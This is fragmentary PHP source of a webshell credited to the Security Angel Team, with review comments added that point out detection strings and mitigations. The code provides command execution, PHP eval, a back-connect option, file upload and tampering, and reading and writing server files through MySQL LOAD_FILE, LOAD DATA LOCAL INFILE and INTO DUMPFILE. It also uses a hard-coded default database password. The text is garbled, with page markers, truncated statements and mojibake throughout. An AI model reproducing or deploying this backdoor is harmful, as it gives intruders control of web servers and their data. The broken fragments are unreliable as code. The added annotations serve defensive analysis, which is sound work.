/*===================== End of configuration =====================*/
// Emit the Content-Type response header that matches the selected $charset.
// NOTE(review): the 'latin1' branch announces iso-8859-2 (Latin-2), not
// iso-8859-1. The closing brace of this chain is not visible in this excerpt.
if ($charset == 'utf8') {
header("content-Type: text/html; charset=utf-8");
} elseif ($charset == 'big5') {
header("content-Type: text/html; charset=big5");
} elseif ($charset == 'gbk') {
header("content-Type: text/html; charset=gbk");
} elseif ($charset == 'latin1') {
header("content-Type: text/html; charset=iso-8859-2");
p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
// File read through the MySQL connection. $mysqldlfile (presumably the
// "mysqldlfile" form field — confirm against the request handling) is placed
// into the LOAD_FILE() call without escaping.
$result = q("select load_file('$mysqldlfile');");
// Fallback when the first query yields nothing: stage the file in a scratch
// table with LOAD DATA LOCAL INFILE, read it back, then drop the table.
// The closing brace of this branch is not visible in this excerpt.
// Detection: the table name tmp_angel and the " angel_<timestamp>_eof "
// terminators are distinctive strings to search for in MySQL general/audit logs.
// Mitigation: do not grant FILE to application accounts, restrict
// secure_file_priv, and disable local_infile on server and client.
if(!$result){
q("DROP TABLE IF EXISTS tmp_angel;");
q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
// Only this statement passes the path through addslashes().
q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY ' angel_{$timestamp}_eof ' ESCAPED BY '' LINES TERMINATED BY ' angel_{$timestamp}_eof ';");
$result = q("select content from tmp_angel");
q("DROP TABLE tmp_angel");
.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}
.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}
.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}
// Use a timestamp to mark the truncation point
<tr class="alt1">
<td><span style="float:right;">Safe Mode:<?php echo getcfg('safe_mode');?></span>
<a href="javascript:goaction('logout');">Logout</a> |
<a href="javascript:goaction('file');">File Manager</a> |
<a href="javascript:goaction('sqladmin');">MySQL Manager</a> |
<a href="javascript:goaction('sqlfile');">MySQL Upload & Download</a> |
<a href="javascript:goaction('shell');">Execute Command</a> |
<a href="javascript:goaction('phpenv');">PHP Variable</a> |
<a href="javascript:goaction('eval');">Eval PHP Code</a>
<?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php }?>
if (!$action || $action == 'file') {
$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
// Determine read/write status
// Delete directory
Trang 7} else {
$time = strtotime("$year-$month-$day $hour:$minute:$second");
m('Modify file the last modified '.(@touch($curfile
Trang 8<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
<form action="" method="post" id="godir" name="godir">
<tr>
<td nowrap>Current Directory (<?php echo $dir_writeable;?>
<td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td> <td nowrap><input class="bt" value="GO" type="submit"></td>
tbhead();
p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div>');p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
if (IS_WIN && IS_COM) {
$obj = new COM('scripting.filesystemobject');
if ($obj && is_object($obj)) {
$DriveTypeDB = array(0 => 'Unknow'
Trang 11foreach($dirdata as $key => $dirdb){
if($dirdb['filename']!=' ' && $dirdb['filename']!='.') {
$thisbg = bg();
p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
foreach($filedata as $key => $filedb){
if($filedb['filename']!=' ' && $filedb['filename']!='.') {
$fileurl = str_replace(SA_ROOT
$thisbg = bg();
p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');
p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');
p('<td nowrap>'.$filedb['mtime'].'</td>');
// File write through the MySQL connection: $contents is embedded as a hex
// literal (presumably the hex-encoded upload — confirm against the code that
// builds it) and written to $savepath with SELECT ... INTO DUMPFILE. Both
// values are interpolated into the statement as-is.
// Detection: INTO DUMPFILE statements issued by a web application account.
// Mitigation: withhold the FILE privilege and restrict secure_file_priv.
// Triage note: mysql_error() belongs to the legacy mysql extension, which was
// removed in PHP 7.0, so this code path only runs on older PHP builds.
Trang 12$result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
// Connection settings that are empty at this point fall back to the matching
// cookie value and, when the cookie is empty too, to a hard-coded default
// (localhost / root / 3306 / t00r / information_schema / no charset).
// NOTE(review): the database password is taken from a cookie, so it would
// appear in clear text wherever request cookies are captured (proxy or WAF
// logs) — a usable indicator together with the default value 't00r'.
!$dbhost && $dbhost = ($_COOKIE['dbhost']!=''?$_COOKIE['dbhost']:'localhost');
!$dbuser && $dbuser = ($_COOKIE['dbuser']!=''?$_COOKIE['dbuser']:'root');
!$dbport && $dbport = ($_COOKIE['dbport']!=''?$_COOKIE['dbport']:3306);
!$dbpass && $dbpass = ($_COOKIE['dbpass']!=''?$_COOKIE['dbpass']:'t00r');
!$dbname && $dbname = ($_COOKIE['dbname']!=''?$_COOKIE['dbname']:'information_schema');
!$charset && $charset = ($_COOKIE['charset']!=''?$_COOKIE['charset']:'');
Trang 13p('<p><b>This operation the DB user must has FILE privilege</b></p>');
p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');p('<h2>Download file</h2>');
p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
elseif ($action == 'sqladmin') {
// Same fallback chain for the SQL admin view: each empty setting is filled
// from the cookie of the same name, else from a hard-coded default.
// No $dbname default is set in this run of statements.
// NOTE(review): credentials arrive via cookies here as well; cookie names
// dbhost/dbuser/dbport/dbpass on a request are worth flagging in HTTP logs.
!$dbhost && $dbhost = ($_COOKIE['dbhost']!=''?$_COOKIE['dbhost']:'localhost');
!$dbuser && $dbuser = ($_COOKIE['dbuser']!=''?$_COOKIE['dbuser']:'root');
!$dbport && $dbport = ($_COOKIE['dbport']!=''?$_COOKIE['dbport']:3306);
!$dbpass && $dbpass = ($_COOKIE['dbpass']!=''?$_COOKIE['dbpass']:'t00r');
!$charset && $charset = ($_COOKIE['charset']!=''?$_COOKIE['charset']:'');
Trang 17if ($tablename && !$sql_query) {
$sql_query = "SELECT * FROM $tablename";
if(is_string($sql_history)) p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2"> Query history:</td></tr><tr><td>'.$sql_history.'</td></tr></table></p>');
p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_querymakehide('tablename'
Trang 18} elseif ($doing == 'insert' || $doing == 'edit') {
$result = q('SHOW COLUMNS FROM '.$tablename);
while ($row = mysql_fetch_array($result)) {
p('<table border="0" cellpadding="3" cellspacing="0">');
foreach ($rowdb as $row) {
p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');}
$table_num = $table_rows = $data_size = 0;
$tabledb = array();
while($table = mysql_fetch_array($query)) {
$data_size = $data_size + $table['Data_length'];
$table_rows = $table_rows + $table['Rows'];
p('<table border="0" cellpadding="0" cellspacing="0">');
p('<form action="'.$self.'" method="POST">');
p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a> [ <a href="javascript:settable(\''.$table['Name'].'\'
Trang 23p('<hr width="100%" noshade /><pre>');
if ($execfunc=='wscript' && IS_WIN && IS_COM) {
fwrite($pipes[0]
Trang 26if (($mode & 0xC000) === 0xC000) {$type = 's';}
elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}elseif (($mode & 0x8000) === 0x8000) {$type = '-';} elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}else {$type = '?';}
$owner['read'] = ($mode & 00400) ? 'r' : '-';
$owner['write'] = ($mode & 00200) ? 'w' : '-';
$owner['execute'] = ($mode & 00100) ? 'x' : '-';
$group['read'] = ($mode & 00040) ? 'r' : '-';
$group['write'] = ($mode & 00020) ? 'w' : '-';
$group['execute'] = ($mode & 00010) ? 'x' : '-';
$world['read'] = ($mode & 00004) ? 'r' : '-';
$world['write'] = ($mode & 00002) ? 'w' : '-';
// 去掉转义å-—符
// 清除HTML代ç
Trang 27return ' / <a href="#" title="User: '.$array['name'].'
Passwd: '.$array['passwd'].'
Uid: '.$array['uid'].'
gid: '.$array['gid'].'
Gecos: '.$array['gecos'].'
Dir: '.$array['dir'].'
Shell: '.$array['shell'].'">'.$array['name'].'</a>';}
Trang 29if (count($filelist)>0){
foreach($filelist as $filename){
if (is_file($filename)){
Trang 30while ($file = readdir($dh)) {
if($file!='.' && $file!=' '){
var $datasec = array();
var $ctrl_dir = array();
$tabledump = "DROP TABLE IF EXISTS $table;\n";
$tabledump = "CREATE TABLE $table (\n";
$firstfield=1;
$fields = q("SHOW FIELDS FROM $table");
while ($field = mysql_fetch_array($fields)) {
$keys = q("SHOW KEYS FROM $table");
while ($key = mysql_fetch_array($keys)) {
Trang 35''
''
$password);
$thefile)).'.zip');
$dbuser
$dbuser
Trang 37td{font: 12px Arial
Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
Monospace;background:#fff;border: 1px solid #666;padding:2px;}
Tahoma;height:22px;}
''
$dir);
-1) != '/') {
Trang 39$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
'w');
$filecontent) ? 'success' : 'failed'));
8
$newperm) ? 'success' : 'failed'));
$nname) ? ' success' : 'failed'));
Trang 41$nowpath);
2);
<?php echo getChmod($nowpath);?>)</td>
Trang 431 => 'Removable'
filemtime($filepath));
Trang 45filesize($filename));
$dbuser
Trang 53\'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\'
Trang 57elseif ($action == 'phpenv') {
$upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
$adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
!$dis_func && $dis_func = 'No';
7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
8 => array('PHP run mode',strtoupper(php_sapi_name())),
9 => array('The file path', FILE ),
<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
<span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
Copyright (C) 2004-2008 <a onclick='javascript:alert("http://www.4ngel.net")' target="_blank">Security Angel Team [S4T]</a> All Rights Reserved
function scookie($key, $value, $life = 0, $prefix = 1) {
global $admin, $timestamp, $_SERVER;
$key = ($prefix ? $admin['cookiepre'] : '').$key;
$life = $life ? $life : $admin['cookielife'];
$from = $curpage - $offset;
$to = $curpage + $page - $offset - 1;
$from = $curpage - $pages + $to;
$to = $pages;
if(($to - $from) < $page && ($to - $from) < $pages) {
$from = $pages - $page + 1;
}}
$multipage = ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
$multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
<form method="POST" action="">
<span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
<input type="hidden" name="doing" value="login">
<input type="submit" value="Login">
</form>
<?php
exit;
Trang 58$mtime = explode(' ', microtime());
$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
echo 'Processed in '.$totaltime.' second(s)';
}
// Connect to the database
function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
p('<h2>Can not connect to MySQL server</h2>');
if($link && mysql_get_server_info() > '4.1') {
if(in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;